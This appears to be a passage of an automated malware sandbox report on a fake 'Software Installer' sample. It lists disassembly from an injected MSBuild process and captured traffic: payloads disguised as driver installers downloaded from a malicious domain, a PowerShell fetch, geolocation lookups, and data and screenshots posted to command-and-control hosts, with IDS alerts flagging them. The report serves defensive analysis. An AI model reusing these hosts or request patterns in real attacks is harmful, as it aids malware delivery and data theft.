Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656547373.000001D778871000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655816250.000001D778281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655966920.000001D778340000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653368487.000001D776D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA256v source: Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Code function: 11_2_00007FF7ECDDA96C FindFirstFileExW | 11_2_00007FF7ECDDA96C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h] | 13_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 6D58C181h | 13_2_00421890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-4926828Eh] | 13_2_00421890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+04h] | 13_2_00413143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], CF91E6EAh | 13_2_0044A106
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then lea ecx, dword ptr [eax+eax] | 13_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then lea ecx, dword ptr [eax-40000000h] | 13_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then lea edx, dword ptr [ecx+ecx] | 13_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then cmp word ptr [edi+ebx], 0000h | 13_2_0044C2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ecx+44h] | 13_2_00444300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+edi+3E8E80E8h] | 13_2_0044D300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov word ptr [ecx], bx | 13_2_0044D300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], esi | 13_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h] | 13_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov ebp, ebx | 13_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, di | 13_2_0042FE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-1272D010h] | 13_2_0042FE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h] | 13_2_0044D7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov word ptr [edi], cx | 13_2_00429840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [00451018h] | 13_2_0040F066
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edi, byte ptr [ecx+esi] | 13_2_00402800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h | 13_2_004480C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov word ptr [eax], cx | 13_2_00410897
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx] | 13_2_00410897
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h] | 13_2_0044D950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-0D0EF488h] | 13_2_0042D92B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh | 13_2_004019E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx-51AE6CD0h] | 13_2_0044AA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov dword ptr [esp], 8B8A8924h | 13_2_0043F250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx+19DCC0F6h] | 13_2_00445250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ebx, byte ptr [ebp+edi+00h] | 13_2_00445250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov byte ptr [ecx], dl | 13_2_00423A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov byte ptr [edi], cl | 13_2_00423A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], C446A772h | 13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh] | 13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh] | 13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h | 13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then jmp eax | 13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+70h] | 13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-49268212h] | 13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx esi, byte ptr [eax] | 13_2_00448220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 13_2_004292C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6BB1A2B4h] | 13_2_004482E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh] | 13_2_00433A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then push eax | 13_2_00449B7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h] | 13_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 13_2_0040A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 13_2_0040A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh] | 13_2_00433A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+34h] | 13_2_00433330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov byte ptr [esi], cl | 13_2_00436BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx+68h] | 13_2_00437BB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov byte ptr [ecx], dl | 13_2_00411C5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 13_2_00435C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov dword ptr [esp+08h], ebx | 13_2_00445C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov word ptr [eax], cx | 13_2_00410C1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx] | 13_2_00410C1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+5Ch] | 13_2_0042F430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 13_2_00441480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+49408C66h] | 13_2_00428CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 13_2_0044BD46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov byte ptr [eax], cl | 13_2_0041EDDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6D3F2F7Eh] | 13_2_00420D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [eax] | 13_2_00448590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+50h] | 13_2_004305B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 13_2_0041AE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov byte ptr [edi], cl | 13_2_00438E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov dword ptr [esp+10h], ecx | 13_2_00438E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then add eax, esi | 13_2_00437627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [ebp+ecx+00h] | 13_2_0040CE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+esi] | 13_2_0040CE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov dword ptr [esp+10h], ecx | 13_2_00438E39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+ecx+0Ah] | 13_2_00445ED1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 13_2_00445ED1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] | 13_2_004236EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 13_2_004386EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov word ptr [eax], cx | 13_2_00432F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edi, byte ptr [esi+edx] | 13_2_00432F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov word ptr [eax], cx | 13_2_00432F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax] | 13_2_0041AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-4926828Ah] | 13_2_0041AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1A92C912h] | 13_2_0040C710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2Ah] | 13_2_0044C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+04h] | 13_2_00412FDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 13_2_00446790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov byte ptr [eax], cl | 13_2_0041EFAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+18h] | 13_2_0040EFAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 13_2_00433FB0

Networking

Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49727
Source: global traffic | TCP traffic: 192.168.2.5:49714 -> 83.217.208.69:5000
Source: global traffic | HTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1 Host: trumpsscamer2009.top
Source: global traffic | HTTP traffic detected: GET /bld/Microsoft_Driver_vs_2019.exe HTTP/1.1 Host: trumpsscamer2009.top
Source: global traffic | HTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1 Host: trumpsscamer2009.top
Source: global traffic | HTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1 Host: trumpsscamer2009.top
Source: global traffic | HTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1 Host: trumpsscamer2009.top
Source: global traffic | HTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1 Host: trumpsscamer2009.top
Source: global traffic | HTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1 Host: trumpsscamer2009.top
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1 Host: ip-api.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1 Host: ip-api.com
Source: global traffic | HTTP traffic detected: POST /send_photo HTTP/1.1
    Host: 83.217.208.69:5000
    Content-Type: multipart/form-data; boundary="c2ca08da-a5fe-4ea8-ba18-84cde3bad365"
    Content-Length: 695598
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
    Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1
    Host: ip-api.com
Source: global traffic | HTTP traffic detected: POST /send HTTP/1.1
    Host: 83.217.208.69:5000
    Content-Type: application/json; charset=utf-8
    Content-Length: 175
    Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 31 34 5c 75 46 45 30 46 20 46 69 6c 65 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 6c 61 75 6e 63 68 65 64 20 5c 6e 5c 6e 20 5c 75 44 38 33 43 5c 75 44 46 46 34 20 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 5c 6e 20 5c 75 32 37 31 36 5c 75 46 45 30 46 20 42 75 69 6c 64 3a 20 4d 69 63 72 6f 73 6f 66 74 20 42 75 69 6c 64 20 5c 6e 20 5c 75 32 37 31 36 5c 75 46 45 30 46 20 48 6f 73 74 3a 20 32 31 36 30 34 31 20 5c 6e 20 22 7d
    Data Ascii: {"message":"\u2714\uFE0F File successfully launched \n\n \uD83C\uDFF4 IP: 8.46.123.189 (United States)\n \u2716\uFE0F Build: Microsoft Build \n \u2716\uFE0F Host: 216041 \n "}
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: ip-api.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 104.26.13.205:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.26.13.205:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 208.95.112.1:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.26.13.205:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49718 -> 104.26.13.205:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 208.95.112.1:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49723 -> 104.26.13.205:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49729 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49732 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49730 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49734 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49735 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49709 -> 172.67.159.94:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49724 -> 172.67.159.94:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 172.67.159.94:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 172.67.159.94:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 172.67.159.94:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 172.67.159.94:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49720 -> 172.67.159.94:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 172.67.159.94:443
Source: global traffic | HTTP traffic detected: GET /scr/plugin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: trumpsscamer2009.top
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /gdJIS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 57
    Host: citydisco.bet
Source: global traffic | HTTP traffic detected: POST /gdJIS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=aTIKewjTUSbhWMs2WyR
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 14934
    Host: citydisco.bet
Source: global traffic | HTTP traffic detected: POST /gdJIS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=40NoBK54gzXw
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15048
    Host: citydisco.bet
Source: global traffic | HTTP traffic detected: POST /gdJIS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=xSOq4JU0Kuvtaek9lgo
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20572
    Host: citydisco.bet
Source: global traffic | HTTP traffic detected: POST /gdJIS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=CB2bEG2e79t5cvL1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2604
    Host: citydisco.bet
Source: global traffic | HTTP traffic detected: POST /gdJIS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=GqUit8221xy
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 572767
    Host: citydisco.bet
Source: global traffic | HTTP traffic detected: POST /gdJIS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 95
    Host: citydisco.bet
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.69
Source: global traffic | HTTP traffic detected: GET /scr/plugin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: trumpsscamer2009.top
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1
    Host: trumpsscamer2009.top
Source: global traffic | HTTP traffic detected: GET /bld/Microsoft_Driver_vs_2019.exe HTTP/1.1
    Host: trumpsscamer2009.top
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
    Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1
    Host: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: trumpsscamer2009.top
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: citydisco.bet
Source: unknown | HTTP traffic detected: POST /gdJIS HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 57
    Host: citydisco.bet
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Fri, 14 Mar 2025 18:43:42 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: max-age=14400
    cf-cache-status: EXPIRED
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=34tESCDWBrViZzzrHeN0bSUCAWzrmIhCh8xsnWaH%2FM330QeYue05md9inbsSeMwhjVTiTDzrSG2%2BEs%2BDJpnSvrK7%2BiYKgg3N%2BeNHJFDsX1%2F0f1eiO8q%2BZUXHQI8%2ByveF6pVFqRcbgg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9205eb0fbb4a7039-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2080&min_rtt=2076&rtt_var=787&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=730&delivery_rate=1382575&cwnd=132&unsent_bytes=0&cid=5ad2b119849edda8&ts=443&x=0"
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Fri, 14 Mar 2025 18:43:45 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: max-age=14400
    cf-cache-status: EXPIRED
